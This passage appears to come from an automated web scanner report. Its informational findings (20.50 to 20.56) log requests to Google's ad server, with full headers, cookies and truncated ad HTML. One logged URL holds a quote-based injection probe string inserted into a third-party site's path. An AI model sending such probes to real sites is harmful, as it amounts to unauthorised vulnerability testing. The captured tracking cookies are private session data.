YXQtc2hvcC9xLWEtYZgC4h3AAgXIAtyH9gmoAwHoA8sD9QMAAADE&num=1&sig=AGiWqtyrwT5xP3OEAfvyZmG47Ddcr8uMNw&client=ca-pub-5812731941170583&adurl=http://clk.atdmt.com/TLC/go/256163696/direct/01/" target="_blank"><img border="0" src="http://view.atdmt.com/TLC/view/256163696/direct/01/http://googleads.g.doubleclick.net/aclk?sa=l&ai=Bu_OooTWNTYPAMsrtlQfXjOGgCKbV2egBlofdphaero6XTgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAGalLXsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gEuaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2JvYXQtc2hvcC9xLWEtYZgC4h3AAgXIAtyH9gmoAwHoA8sD9QMAAADE&num=1&sig=AGiWqtyrwT5xP3OEAfvyZmG47Ddcr8uMNw&client=ca-pub-5812731941170583&adurl=" /></a></noscript>
<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=valueclick&cid=480&t=72"></script>
...[SNIP]...
20.50. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098464&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fwww.vcahospitals.com_80.htm&dt=1301080464727&bpp=5&shv=r20110315&jsv=r20110321-2&correlator=1301080464829&frm=0&adk=1607234649&ga_vid=731449185.1301080465&ga_sid=1301080465&ga_hid=774126141&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=995&eid=36813006&fu=0&ifi=1&dtd=126&xpc=FEQ2q8FQ2T&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 19:13:36 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 12562
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/netsparker/www.vcahospitals.com_80.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.ctfluidpower.com%26adT%3DParker%2BHannifin%2BProducts%26adU%3DOfficeMax.com/Pens%26adT%3DBuy%2BRollerball%2BPens%26adU%3Dwww.AmsterdamPrinting.com%26adT%3DAmsterdam%2BPrinting%2BSale%26gl%3DUS&amp;usg=AFQjCNEADggDFj0S2Wn2kRIbyArw7yYBxQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
20.51. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-5812731941170583&output=html&h=90&slotname=4723656422&w=728&lmt=1301121447&flash=10.2.154&url=http%3A%2F%2Fwww.soundingsonline.com%2Farchives%2F%2BNSFTW%2B%3Fordering%3D%26searchphrase%3Dall&dt=1301103497608&bpp=1&shv=r20110315&jsv=r20110321-2&correlator=1301103497644&frm=0&adk=3965760877&ga_vid=1118154544.1301103498&ga_sid=1301103498&ga_hid=2034243247&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1426&bih=995&fu=0&ifi=1&dtd=1908&xpc=YNKBJ0Atab&p=http%3A//www.soundingsonline.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 26 Mar 2011 01:37:32 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 1596
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><iframe frameborder='0' marginwidth='0' marginheight='0' scrolling='no' width='728' height='90' src='http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D'></iframe>
...[SNIP]...
20.52. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-5812731941170583&output=html&h=90&slotname=4723656422&w=728&lmt=1301098401&flash=10.2.154&url=http%3A%2F%2Fwww.soundingsonline.com%2Farchives%2F'%2BNSFTW%2B'%3Fordering%3D%26searchphrase%3Dall&dt=1301080451524&bpp=2&shv=r20110315&jsv=r20110321-2&correlator=1301080451557&frm=0&adk=3965760877&ga_vid=1149373581.1301080452&ga_sid=1301080452&ga_hid=296249257&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1426&bih=995&fu=0&ifi=1&dtd=173&xpc=YX6LgXnGza&p=http%3A//www.soundingsonline.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 19:13:23 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 4119
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.soundingsonline.com/archives/%2527%252BNSFTW%252B%2527%253Fordering%253D%2526searchphrase%253Dall%26hl%3Den%26client%3Dca-pub-5812731941170583%26adU%3DIntlCardService.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHYw3bsmdygFH21H-_aBY2d5DEC-A" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
20.53. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098441&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fwww.soundingsonline.com_80.htm&dt=1301080440634&bpp=4&shv=r20110315&jsv=r20110321-2&correlator=1301080441371&frm=0&adk=1607234649&ga_vid=967180559.1301080441&ga_sid=1301080441&ga_hid=295407676&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=979&eid=44901217&fu=0&ifi=1&dtd=764&xpc=MMXNXDQ6lh&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 19:13:14 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 4637
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/netsparker/www.soundingsonline.com_80.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.AmsterdamPrinting.com/TopPens%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHKc4EddQTFsIizZFp4_ELVEnzP0Q" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
20.54. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301551004&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fboolean-sql-injection-database-user-admin-xss-bizfind.us.htm&dt=1301533004275&bpp=4&shv=r20110324&jsv=r20110321-2&correlator=1301533004660&frm=0&adk=1607234649&ga_vid=752823351.1301533005&ga_sid=1301533005&ga_hid=1965805869&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1001&bih=917&eid=33895132&fu=0&ifi=1&dtd=412&xpc=oXtmeACmBH&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 31 Mar 2011 00:56:04 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 4668
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="728" HEIGHT="90"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CMLb0buepoe7mwEQ2AUYWjIIXfZ5xPdgr0k">
...[SNIP]...
KgDAfUDAAAAxA%26num%3D1%26sig%3DAGiWqtwvCHtL2P86FjaNDrICCQWzcLIjPQ%26client%3Dca-pub-4063878933780912%26adurl%3Dhttp://lovealocalbusiness.intuit.com/sbo%253Fcid%253Dsoc_gg_lalb__sbo%2526vtid%253Dgsem"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CMLb0buepoe7mwEQ2AUYWjIIXfZ5xPdgr0k" id="google_flash_embed" WIDTH="728" HEIGHT="90" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBCgE1JNGTTaeNGY_ulQeY85TtDdbuheEBnru7zhGWk9-WSdDxhgEQARgBIL7O5Q04AFCN29fFBGDJBqAB7vLJ-QO6AQk3Mjh4OTBfYXPIAQTaAV9maWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9uZXRzcGFya2VyL2Jvb2xlYW4tc3FsLWluamVjdGlvbi1kYXRhYmFzZS11c2VyLWFkbWluLXhzcy1iaXpmaW5kLnVzLmh0bYACAbgCGMACBcgC_uyTFKgDAfUDAAAAxA%26num%3D1%26sig%3DAGiWqtwvCHtL2P86FjaNDrICCQWzcLIjPQ%26client%3Dca-pub-4063878933780912%26adurl%3Dhttp://lovealocalbusiness.intuit.com/sbo%253Fcid%253Dsoc_gg_lalb__sbo%2526vtid%253Dgsem" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/netsparker/boolean-sql-injection-database-user-admin-xss-bizfind.us.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DLoveALocalBusiness.Intuit.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNERaU249SubpijRDNbXJmKpyvqwHQ" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
20.55. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301550531&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Flfi-local-file-inclusion-example-poc-execution.htm&dt=1301532531100&bpp=5&shv=r20110324&jsv=r20110321-2&correlator=1301532531226&frm=0&adk=1607234649&ga_vid=1384584146.1301532531&ga_sid=1301532531&ga_hid=1845881660&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1001&bih=933&fu=0&ifi=1&dtd=258&xpc=YFMrd02VFX&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 31 Mar 2011 00:48:11 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 4299
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/netsparker/lfi-local-file-inclusion-example-poc-execution.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DClickability.com/CMS%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNFhRSGcKF_naz6rqz4QADxLooYZtw" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
20.56. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998889&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fstored-xss-dork-permanent-cross-site-scripting.order.1and1.com.html&dt=1301140315791&bpp=3&shv=r20110315&jsv=r20110321-2&correlator=1301140316871&frm=0&adk=1607234649&ga_vid=549234652.1301140318&ga_sid=1301140318&ga_hid=512201360&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=979&fu=0&ifi=1&dtd=2144&xpc=HWMIgtSEOg&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 26 Mar 2011 11:51:11 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 4715
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="728" HEIGHT="90"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CMLb0buepoe7mwEQ2AUYWjIIXfZ5xPdgr0k">
...[SNIP]...
